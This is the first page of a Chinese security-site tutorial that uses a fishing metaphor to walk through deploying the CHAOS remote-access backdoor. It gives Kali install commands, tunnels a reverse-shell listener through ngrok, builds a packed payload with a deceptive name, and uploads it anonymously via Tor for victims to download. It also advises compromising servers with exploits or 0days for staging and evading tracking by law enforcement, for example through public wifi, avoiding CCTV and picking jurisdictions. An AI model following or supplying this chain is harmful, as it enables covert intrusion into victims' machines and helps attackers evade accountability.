欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

用鱼竿、鱼钩、鱼饵和彩蛋模拟一次网络渗透

来源:本站整理 作者:flagellantX 时间:2018-04-03 TAG: 我要投稿

一、工具
鱼竿:
基于golang语言的CHAOS远程后门(作者是巴西的开源爱好者)
https://github.com/tiagorlampert/CHAOS
鱼钩:
ngrok(可以利用github账号登陆注册)
https://ngrok.com/
鱼饵:
洋葱路由
(http://www.theonionrouter.com/)
匿名网络空间
(https://www.upload.ee/)
彩蛋:
钓鱼攻击配置用到的exp
(word宏利用、浏览器插件利用)
匿名邮箱
(http://www.yopmail.com/)
(https://mytemp.email/)
匿名网上冲浪和洋葱共享
(内详)
在线匿名的获得一个美帝电话号
(内详)
渗透测试环境系统和平台
(内详)
二、鱼竿
后门在kali上的安装:
# Install dependencies (You need Golang and UPX package installed)
$ apt install golang upx-ucl -y
# Clone this repository
$ git clone https://github.com/tiagorlampert/CHAOS.git
# Go into the repository
$ cd CHAOS
# Run
$ go run CHAOS.go
成功运行后如图:

 
三、鱼钩
外网环境布置(ngrok):
注册ngrok,否则无法使用tcp转发模块,可以使用github便捷登陆
https://dashboard.ngrok.com/user/signup

在kali中下载并放置于运行目录:


添加token目的是使用tcp模块:
https://dashboard.ngrok.com/get-started
将这行代码复制并且在kali中执行


开启ngrok为自己开启一条外网通道:
./ngrok tcp 4444


标记的两个需要注意是域名和端口,以我的例子为[0.tcp.ngrok.io]和[19413]
下一步ping出[0.tcp.ngrok.io]的ip地址,以上这一种利用同样适用于各类python开发的远程后门和msf都适用,甚至windows也非常适用,是一个非常便捷的端口转发技巧:

标记好这个ip地址后,进入chaos操作:
选择1制作一个payload

填入刚刚ping出的ip:

端口写刚刚标记的端口:

为自己的后门写个具有欺骗性的名字,并加壳,然后启动tcp监听返回的shell:

监听的本地端口写4444,因为我们刚才转发的就是本机4444端口作为监听端口,至此后门布置完成,也就是你的鱼竿和鱼钩已经准备好了,
四、鱼饵
接下来就是放置鱼饵:
后门在chaos的目录下面,我们把它通过洋葱路由上传到网络空间

上传好以后就会有下载链接,这一步就不赘述了:

使用洋葱路由就是为了匿名化,当然这个网络空间对于国内用户可能会网速过慢或者下载不成功,所以我这里也建议你做好跳板以后利用exp或者你自己的0day1day刷一些服务器选择一台合适的服务器作为网络空间(针对目标的地区选择,考虑法律因素和该地区监管追查能力),但原则是隐藏好自己,可以多利用非本土的网络和公共的网络(无cctv录像监控,将移动电脑放进书包不要电脑包,或者直接使用公共无监管电脑,公共wifi,甚至是黑网吧人流大而杂的网络区域,使用live系统,加密你的硬盘等等这些在本篇不做赘述)进行,所以这一步就是将后门放置在公共网络空间http://公共空间/后门.exe

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载